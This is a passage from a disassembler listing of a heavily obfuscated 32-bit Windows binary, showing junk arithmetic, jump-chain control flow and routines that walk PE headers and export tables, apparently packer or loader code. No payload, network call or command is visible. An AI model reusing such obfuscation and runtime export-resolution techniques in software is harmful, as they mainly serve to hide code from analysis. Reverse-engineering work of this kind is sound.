push ebp
mov ebp, esp
push ecx
call sub_428309
loc_42898A: ; CODE XREF: sub_424946+38AD�j
jmp loc_424F5C
sub_42897B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426859
loc_42898F: ; CODE XREF: sub_426859+C�j
jmp nullsub_70
; END OF FUNCTION CHUNK FOR sub_426859
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_428994: ; CODE XREF: sub_426A78-1981�j
jmp loc_425187
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425029
loc_428999: ; CODE XREF: sub_425029:loc_428244�j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
call sub_42441D
; END OF FUNCTION CHUNK FOR sub_425029
; =============== S U B R O U T I N E =======================================
sub_4289A4 proc near ; CODE XREF: hjohnhn9:00424BFC�p
; hjohnhn9:00427C13�j
xchg ecx, [esp+0]
pop ecx
call nullsub_2
jmp loc_4270BB
sub_4289A4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4289B2 proc near ; CODE XREF: sub_4279ED+3�j
add esp, 0FFFFFED8h
mov [ebp-8], edx
loc_4289BB: ; CODE XREF: sub_423F65:loc_424F8B�j
call sub_423CDB
sub_4289B2 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425EA9
loc_4289C0: ; CODE XREF: sub_425EA9+6�j
jmp loc_424801
; END OF FUNCTION CHUNK FOR sub_425EA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A28
loc_4289C5: ; CODE XREF: sub_424A28:loc_4276BB�j
jnz loc_4260A9
jmp loc_427ACF
; END OF FUNCTION CHUNK FOR sub_424A28
; ---------------------------------------------------------------------------
push edx
mov edx, eax
xchg edx, [esp]
call sub_426AF6
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_4289DB: ; CODE XREF: sub_427C9B-1BD3�j
adc edx, ecx
loc_4289DD: ; CODE XREF: sub_426A78:loc_425187�j
call sub_424877
mov edx, 0D504D785h
call sub_4279ED
push edi
mov edi, eax
xchg edi, [esp+0]
jmp loc_423771
; END OF FUNCTION CHUNK FOR sub_427C9B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_4289F8: ; CODE XREF: sub_42466E+3F1A�j
jmp loc_42309F
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_4289FD: ; CODE XREF: sub_42363F+398B�j
push eax
call sub_4244F5
retn
; END OF FUNCTION CHUNK FOR sub_42363F
; ---------------------------------------------------------------------------
loc_428A04: ; DATA XREF: sub_424819+2BE6�o
push esi
mov esi, edx
xchg esi, [esp]
push offset sub_4236A7
jmp loc_428734
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_428A14: ; CODE XREF: sub_4263E3-1B37�j
jl loc_427F10
jmp loc_425056
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
or edx, edi
and edx, eax
jmp sub_4249E1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EC9
loc_428A28: ; CODE XREF: sub_424EC9:loc_427298�j
xor eax, 6FC7DEFFh
push edi
pushf
push offset sub_427D6A
jmp loc_42797A
; END OF FUNCTION CHUNK FOR sub_424EC9
; ---------------------------------------------------------------------------
loc_428A3A: ; CODE XREF: hjohnhn9:loc_427B88�j
pop edx
sub edx, 0E4E7A73Eh
add edx, 9C59D4EBh
or edx, 46B6616Ah
rol edx, 1Fh
add edx, 106308B1h
jmp loc_42697C
; ---------------------------------------------------------------------------
loc_428A5B: ; CODE XREF: hjohnhn9:00423DA3�j
jge loc_427C2C
push 675F903Ah
jmp sub_428162
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4266B5
loc_428A6C: ; CODE XREF: sub_4266B5:loc_425D55�j
mov esi, ecx
xchg esi, [esp+4+var_4]
mov esp, ebp
xchg eax, [esp+0]
mov ebp, eax
pop eax
jmp loc_426B04
; END OF FUNCTION CHUNK FOR sub_4266B5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247F4
loc_428A7E: ; CODE XREF: sub_4247F4+2571�j
sub esi, 76DE389Ch
xor esi, 0DF502266h
add esi, ebp
add esi, 0E949C2C4h
jmp loc_42634A
; END OF FUNCTION CHUNK FOR sub_4247F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E98
loc_428A97: ; CODE XREF: sub_428E98-1E11�j
pop esi
push offset loc_4276EB
jmp loc_424FDE
; END OF FUNCTION CHUNK FOR sub_428E98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_428AA2: ; CODE XREF: sub_42304F:loc_424F48�j
push offset sub_423F65
jmp nullsub_74
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D38
loc_428AAC: ; CODE XREF: sub_424D38+15�j
call sub_427564
push offset loc_4268D3
jmp loc_423958
; END OF FUNCTION CHUNK FOR sub_424D38
; =============== S U B R O U T I N E =======================================
sub_428ABB proc near ; DATA XREF: sub_428D49+11�o
cmp ds:dword_426E3C, 0
jnz loc_427FBF
push offset loc_42805E
jmp nullsub_83
sub_428ABB endp
; ---------------------------------------------------------------------------
loc_428AD2: ; CODE XREF: hjohnhn9:00426A1C�j
popf
jmp loc_426491
; ---------------------------------------------------------------------------
loc_428AD8: ; CODE XREF: hjohnhn9:00427770�j
cmp edx, 0B4BB5C59h
jmp loc_4240FF
; ---------------------------------------------------------------------------
db 0DAh
dword_428AE4 dd 0 ; DATA XREF: sub_4264CF+4�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42392D
loc_428AE8: ; CODE XREF: sub_42392D+C�j
jmp loc_424E36
; END OF FUNCTION CHUNK FOR sub_42392D
; ---------------------------------------------------------------------------
db 88h, 0F5h, 6Fh
dword_428AF0 dd 0 ; DATA XREF: hjohnhn9:004236CD�w
; hjohnhn9:004236D2�r ...
dword_428AF4 dd 93B23775h, 46C51999h ; DATA XREF: sub_427C9B-219C�o
db 1Bh, 36h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240E6
loc_428AFF: ; CODE XREF: sub_4240E6+14�j
jmp loc_42744E
; END OF FUNCTION CHUNK FOR sub_4240E6
; ---------------------------------------------------------------------------
dword_428B04 dd 0 ; DATA XREF: sub_426671-657�r
; hjohnhn9:0042669A�w ...
dword_428B08 dd 0 ; DATA XREF: sub_42855B-5237�r
; sub_427C9B-4527�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428CE7
loc_428B0C: ; CODE XREF: sub_428CE7+15A�j
jmp nullsub_126
; END OF FUNCTION CHUNK FOR sub_428CE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428183
loc_428B11: ; CODE XREF: sub_428183-32CB�j
jmp loc_42332F
; END OF FUNCTION CHUNK FOR sub_428183
; ---------------------------------------------------------------------------
dw 8362h
dword_428B18 dd 0 ; DATA XREF: sub_42362A+A�w
; sub_42363F+2641�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_428B1C: ; CODE XREF: sub_427486+1467�j
jmp loc_428BC1
; END OF FUNCTION CHUNK FOR sub_427486
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_428B22: ; CODE XREF: sub_427564-2AA0�j
jmp loc_423A98
; END OF FUNCTION CHUNK FOR sub_427564
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_428B28 proc near ; CODE XREF: hjohnhn9:0042386A�j
; sub_426354-10D5�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423279 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xchg ecx, [esp-4+arg_0]
jmp loc_423279
sub_428B28 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_428B34: ; CODE XREF: sub_425BD2:loc_426EFE�j
jz loc_4277E8
jmp loc_427028
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
and edx, ebp
jmp sub_426D17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_428B46: ; CODE XREF: sub_42325E:loc_426FE4�j
jnz loc_424E6B
loc_428B4C: ; CODE XREF: sub_42325E:loc_427BBD�j
add esi, 0E8DA9B7Fh
add esi, ebp
add esi, 0D5210B75h
mov esi, [esi]
jmp loc_428F20
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_428B61: ; CODE XREF: sub_4262C5-279D�j
; sub_424631:loc_425B0E�j
push ecx
call sub_428829
loc_428B67: ; CODE XREF: sub_426354-57�j
; hjohnhn9:00426512�j
jmp loc_425C11
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
loc_428B6C: ; CODE XREF: hjohnhn9:004241B9�j
jmp loc_42671A
; ---------------------------------------------------------------------------
loc_428B71: ; DATA XREF: sub_423FB9+A�o
mov eax, [eax]
cmp dword ptr [eax+3Ch], 0
jz loc_42476D
jmp loc_427208
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E4F
loc_428B82: ; CODE XREF: sub_424E4F:loc_4265B3�j
mov [ebp+var_8], eax
jmp loc_4244E4
; END OF FUNCTION CHUNK FOR sub_424E4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_428B8A: ; CODE XREF: sub_424A78+216B�j
test byte ptr [ebp-8], 8
push offset sub_42626F
jmp nullsub_78
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
loc_428B98: ; CODE XREF: hjohnhn9:004273E9�j
not ebp
pop edx
push 0E1B35378h
loc_428BA0: ; CODE XREF: hjohnhn9:loc_427F4E�j
push offset sub_426CC8
jmp locret_42664F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423753
loc_428BAA: ; CODE XREF: sub_423753+3ADC�j
add edx, ecx
; END OF FUNCTION CHUNK FOR sub_423753
; START OF FUNCTION CHUNK FOR sub_426354
loc_428BAC: ; CODE XREF: sub_423753:loc_425CF5�j
; hjohnhn9:00426F39�j ...
mov eax, [ebp-8]
mov ecx, 0Ah
cdq
idiv ecx
push offset sub_425B34
jmp loc_42854C
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_428BC1: ; CODE XREF: sub_427486:loc_428B1C�j
rol edx, 17h
test edx, 2000000h
jmp loc_427292
; END OF FUNCTION CHUNK FOR sub_427486
; =============== S U B R O U T I N E =======================================
sub_428BCF proc near ; DATA XREF: sub_425E94+5�o
var_4 = dword ptr -4
push eax
mov eax, [ebp-4]
mov eax, [eax+3Ch]
cdq
add eax, [esp+4+var_4]
adc edx, [esp+4]
call sub_427994
sub_428BCF endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424631
loc_428BE3: ; CODE XREF: sub_424631+14E3�j
jmp loc_423B24
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_428BE8: ; CODE XREF: sub_424698:loc_4241A5�j
sub edi, eax
and ecx, ebx
jb loc_425C56
jmp loc_4261CF
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_428BF7: ; CODE XREF: sub_423F65:loc_426C64�j
and eax, ds:4000F6h
push offset loc_424056
jmp nullsub_80
; END OF FUNCTION CHUNK FOR sub_423F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D0E
loc_428C07: ; CODE XREF: sub_428D0E+B�j
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_428EEB
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
jmp loc_423B92
; END OF FUNCTION CHUNK FOR sub_428D0E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428C28: ; CODE XREF: hjohnhn9:00426171�j
jmp loc_4246ED
; ---------------------------------------------------------------------------
loc_428C2D: ; DATA XREF: sub_426671-34FB�o
push eax
pushf
push 0C227AD4Bh
pop eax
jmp loc_425D00
; ---------------------------------------------------------------------------
call sub_4235C9
; START OF FUNCTION CHUNK FOR sub_426604
loc_428C3F: ; CODE XREF: sub_426604+10�j
jmp loc_426894
; END OF FUNCTION CHUNK FOR sub_426604
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_428C44: ; CODE XREF: sub_424631+B51�j
jmp loc_425235
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_428C49: ; CODE XREF: sub_423B05-C5�j
jmp loc_425252
; END OF FUNCTION CHUNK FOR sub_423B05
; =============== S U B R O U T I N E =======================================
sub_428C4E proc near ; CODE XREF: hjohnhn9:00428115�j
; sub_42870E+5�p
; FUNCTION CHUNK AT 00425EA4 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
pop ebp
mov eax, ds:dword_423950
call sub_42859A
loc_428C5E: ; CODE XREF: sub_424631-FC5�j
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
or eax, 10h
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_425EA4
sub_428C4E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_428C75: ; CODE XREF: sub_424631-FCB�j
cmp dword ptr [ebp-10h], 2
jnz loc_426894
jmp loc_4230C9
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_428C84: ; CODE XREF: sub_423BC3:loc_424FE3�j
mov ebp, eax
xchg ebp, [esp-4+arg_0]
push 2173D128h
xchg ecx, [esp+0]
mov eax, ecx
pop ecx
or eax, ds:4000F0h
xor eax, 43105B17h
jmp loc_4270E3
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
call sub_427B7A
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_428CAA: ; CODE XREF: sub_425BD2+1C28�j
jmp loc_426235
; END OF FUNCTION CHUNK FOR sub_425BD2
; =============== S U B R O U T I N E =======================================
sub_428CAF proc near ; CODE XREF: sub_4278DC:loc_427A24�j
; sub_425BD2:loc_428DA6�p
; FUNCTION CHUNK AT 00427048 SIZE 00000018 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-4]
mov byte ptr [eax], 0
push 99D469C7h
add eax, 7F96339Ah
jmp loc_427048
sub_428CAF endp
; =============== S U B R O U T I N E =======================================
sub_428CC9 proc near ; DATA XREF: sub_425E49+7�o
; FUNCTION CHUNK AT 00423E25 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425B86 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004288C9 SIZE 0000000B BYTES
push eax
call sub_4278DC
test eax, eax
jz loc_42476D
jmp loc_4288C9
sub_428CC9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov eax, 3560E78Eh
push ebp
jmp sub_4248F9
; =============== S U B R O U T I N E =======================================
sub_428CE7 proc near ; CODE XREF: hjohnhn9:0042331B�j
; sub_4263C7+7�p
; FUNCTION CHUNK AT 00428B0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E3C SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
push eax
call sub_42345B
jmp loc_428E3C
sub_428CE7 endp
; ---------------------------------------------------------------------------
push 4F6CFCF7h
jmp loc_42430F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F85
loc_428D00: ; CODE XREF: sub_426F85-EA0�j
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov eax, [eax+60h]
jmp loc_4277CE
; END OF FUNCTION CHUNK FOR sub_426F85
; =============== S U B R O U T I N E =======================================
sub_428D0E proc near ; CODE XREF: sub_427C53+3�j
; FUNCTION CHUNK AT 00423B92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004277C5 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00428C07 SIZE 00000020 BYTES
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
jmp loc_428C07
sub_428D0E endp
; =============== S U B R O U T I N E =======================================
sub_428D1E proc near ; CODE XREF: hjohnhn9:00427A2B�j
; sub_42304F:loc_428079�p
xchg edi, [esp+0]
pop edi
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
call sub_427810
sub_428D1E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4250C3
loc_428D2E: ; CODE XREF: sub_4250C3+7�j
jmp loc_428F58
; END OF FUNCTION CHUNK FOR sub_4250C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D64
loc_428D33: ; CODE XREF: sub_428D64:loc_426A58�j
mov al, [ebp-0Bh]
mov ecx, 8
sub ecx, eax
xor eax, eax
mov al, [ebp-9]
shl eax, cl
jmp loc_424286
; END OF FUNCTION CHUNK FOR sub_428D64
; =============== S U B R O U T I N E =======================================
sub_428D49 proc near ; CODE XREF: sub_424877:loc_4265EE�p
; hjohnhn9:004272DF�j
xchg eax, [esp+0]
pop eax
add esp, 0FFFFFFECh
mov eax, offset dword_425AEC
call sub_427C43
push offset sub_428ABB
jmp nullsub_84
sub_428D49 endp
; =============== S U B R O U T I N E =======================================
sub_428D64 proc near ; DATA XREF: sub_4262C5-2E5A�o
; FUNCTION CHUNK AT 00424286 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426A58 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042876C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428D33 SIZE 00000016 BYTES
mov al, [ebp-0Ah]
and al, 7
mov [ebp-0Bh], al
xor eax, eax
jmp loc_426A58
sub_428D64 endp
; ---------------------------------------------------------------------------
add edx, ecx
sbb esi, 0BF9BA491h
jmp sub_424B30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_428D80: ; CODE XREF: sub_423B05:loc_4263DE�j
push 0C5B0C62Bh
pop eax
add eax, 63E2D2B1h
sub eax, 0B9943B0h
and eax, 4310F3D6h
add eax, 0B61FD10Eh
jmp loc_4233E1
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
locret_428DA3: ; CODE XREF: hjohnhn9:0042908E�j
retn
; ---------------------------------------------------------------------------
loc_428DA4: ; CODE XREF: hjohnhn9:00423593�j
mov [ebx], ebp
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_428DA6: ; CODE XREF: sub_426C09:loc_42361F�j
; hjohnhn9:loc_4251A7�j ...
call sub_428CAF
loc_428DAB: ; CODE XREF: sub_426D02:loc_42326A�j
add eax, ebp
push ecx
push 57FC02BCh
pop ecx
xor ecx, 297E2B69h
rol ecx, 2
jmp loc_425D5B
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
loc_428DC2: ; DATA XREF: sub_4281B9+11�o
cmp dword ptr [eax-1Ch], 0F6h
setz al
jmp loc_424EE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_428DD1: ; CODE XREF: sub_424631:loc_4249A3�j
push offset sub_427D9D
jmp nullsub_86
; END OF FUNCTION CHUNK FOR sub_424631
; =============== S U B R O U T I N E =======================================
sub_428DDB proc near ; DATA XREF: sub_428271-39A�o
; FUNCTION CHUNK AT 00426A92 SIZE 00000005 BYTES
xor edx, edx
push edx
push eax
loc_428DDF: ; CODE XREF: sub_427852:loc_4242E8�j
mov eax, [ebp-18h]
add eax, eax
push offset sub_427E54
jmp loc_426A92
sub_428DDB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_428DEE: ; CODE XREF: sub_427486-28E�j
jz loc_4288D7
jmp loc_42736F
; END OF FUNCTION CHUNK FOR sub_427486
; =============== S U B R O U T I N E =======================================
sub_428DF9 proc near ; CODE XREF: sub_4265CD-32E0�p
; hjohnhn9:004266EB�j
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg edi, [esp-4+arg_0]
retn
sub_428DF9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428E01 proc near ; CODE XREF: hjohnhn9:00426AB4�p
push ebp
mov ebp, esp
push ecx
mov esp, ebp
sub_428E01 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424698
loc_428E07: ; CODE XREF: sub_424698:loc_423AD2�j
jmp loc_424757
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_428E0C: ; CODE XREF: sub_427C9B:loc_424208�j
ror eax, 0Fh
mov ds:dword_423390, eax
retn
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_428E16: ; CODE XREF: sub_424631+30A8�j
jmp loc_425164
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_428E1B: ; CODE XREF: sub_424698-D98�j
rol eax, 0Fh
push ebp
mov ebp, eax
push offset loc_428F02
jmp nullsub_88
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
or edx, ecx
jmp sub_423753
; ---------------------------------------------------------------------------
and edx, ebx
jmp sub_4240BC
; ---------------------------------------------------------------------------
loc_428E39: ; CODE XREF: hjohnhn9:00424DDD�j
xchg eax, [esp]
; START OF FUNCTION CHUNK FOR sub_428CE7
loc_428E3C: ; CODE XREF: sub_428CE7+A�j
push offset sub_424D99
jmp loc_428B0C
; END OF FUNCTION CHUNK FOR sub_428CE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426749
loc_428E46: ; CODE XREF: sub_426749+1�j
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:byte_426E54, 0
jnz loc_423741
lea edx, [ebp-14h]
mov eax, offset dword_426E60
jmp loc_4281F8
; END OF FUNCTION CHUNK FOR sub_426749
; =============== S U B R O U T I N E =======================================
sub_428E65 proc near ; DATA XREF: sub_4278F6+4�o
cmp ds:dword_423940, 0
push offset loc_423C44
jmp loc_424918
sub_428E65 endp
; =============== S U B R O U T I N E =======================================
sub_428E76 proc near ; CODE XREF: sub_426A30-213C�p
; hjohnhn9:00427217�j
xchg edx, [esp+0]
pop edx
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_425B24
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_425B24
jmp loc_427E4F
sub_428E76 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_428E98 proc near ; CODE XREF: sub_428CC9-3FA�j
; FUNCTION CHUNK AT 00423E17 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424FDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042707F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428A97 SIZE 0000000B BYTES
push ebx
jle loc_426FE4
test esi, 0C845AEE7h
jmp loc_423E17
sub_428E98 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A28
loc_428EAA: ; CODE XREF: sub_424A28:loc_4284A7�j
or edx, 0DAC2EAFDh
xchg esi, eax
and eax, 84FD1F4Dh
adc edx, esi
jmp sub_42677F
; END OF FUNCTION CHUNK FOR sub_424A28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_428EBF: ; CODE XREF: sub_42325E:loc_4231D4�j
; sub_427C9B:loc_4271AE�j
call sub_424946
locret_428EC4: ; CODE XREF: sub_428DDB:loc_426A92�j
retn
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
loc_428EC5: ; CODE XREF: hjohnhn9:004245FD�j
jmp loc_428363
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428ECB: ; CODE XREF: hjohnhn9:00423C80�j
jmp locret_4285D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_428ED0: ; CODE XREF: sub_424819:loc_426875�j
; hjohnhn9:loc_426889�j
rol ebx, 14h
cmp ebx, 0D223451h
jmp loc_423EC7
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_428EDE: ; CODE XREF: sub_426A78:loc_4250D5�j
xor ecx, edi
jmp loc_426573
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E54
loc_428EE5: ; CODE XREF: sub_427E54:loc_423E31�j
add eax, [ebp-4]
mov [ebp-0Ch], eax
; END OF FUNCTION CHUNK FOR sub_427E54
; START OF FUNCTION CHUNK FOR sub_426F85
loc_428EEB: ; CODE XREF: sub_426F85-EB4�j
; sub_426F85+11CD�j ...
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_426F85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_428EF2: ; CODE XREF: sub_428271:loc_427EC8�j
; sub_427852+AD7�j
inc dword ptr [ebp-18h]
jmp loc_425156
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
rol esi, 4
jmp sub_426AF6
; ---------------------------------------------------------------------------
loc_428F02: ; DATA XREF: sub_424698+4789�o
xchg ebp, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426D02
loc_428F06: ; CODE XREF: sub_426D02+10�j
jmp loc_427458
; END OF FUNCTION CHUNK FOR sub_426D02
; =============== S U B R O U T I N E =======================================
sub_428F0B proc near ; CODE XREF: hjohnhn9:loc_426AAD�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423598 SIZE 00000010 BYTES
push edi
mov edi, ebp
xchg edi, [esp+4+var_4]
jmp loc_423598
sub_428F0B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_428F16: ; CODE XREF: sub_427852-DAA�j
add eax, [edx+20h]
xor edx, edx
call sub_428271
; END OF FUNCTION CHUNK FOR sub_427852
; START OF FUNCTION CHUNK FOR sub_42325E
loc_428F20: ; CODE XREF: sub_42325E+58FE�j
xor eax, esi
push offset sub_42420D
jmp nullsub_92
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
loc_428F2C: ; CODE XREF: hjohnhn9:00424BC9�j
jns loc_423533
and edx, 0B8C2C0D4h
jmp loc_42706D
; ---------------------------------------------------------------------------
call sub_4262C5
xor eax, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_428F45: ; CODE XREF: sub_42304F+1D45�j
jmp nullsub_93
; END OF FUNCTION CHUNK FOR sub_42304F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428F4A proc near ; DATA XREF: sub_425CB3+B09�o
push edx
mov edx, ebp
xchg edx, [esp+0]
mov ebp, esp
push edi
jmp loc_4249D7
sub_428F4A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250C3
loc_428F58: ; CODE XREF: sub_4250C3:loc_428D2E�j
cmp dword ptr [ebp-4], 0
jz loc_4244EE
push offset loc_426255
jmp nullsub_94
; END OF FUNCTION CHUNK FOR sub_4250C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F90
loc_428F6C: ; CODE XREF: sub_427F90:loc_4275E4�j
xor eax, eax
mov [ebp+var_8], eax
loc_428F71: ; CODE XREF: sub_42486B:loc_42836D�j
jnb loc_42849F
mov eax, [ebp+var_C]
cmp byte ptr [eax], 0
jnz loc_42712D
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
jmp loc_42440F
; END OF FUNCTION CHUNK FOR sub_427F90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426C09
loc_428F8E: ; CODE XREF: hjohnhn9:loc_4240FF�j
; sub_426C09-D89�j
jb loc_42654D
jg loc_42895C
jmp loc_428DA6
; END OF FUNCTION CHUNK FOR sub_426C09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_428F9F: ; CODE XREF: sub_423BC3+3EC4�j
adc esi, 0EEB2035Eh
xor ecx, 62F29220h
rol esi, 0Dh
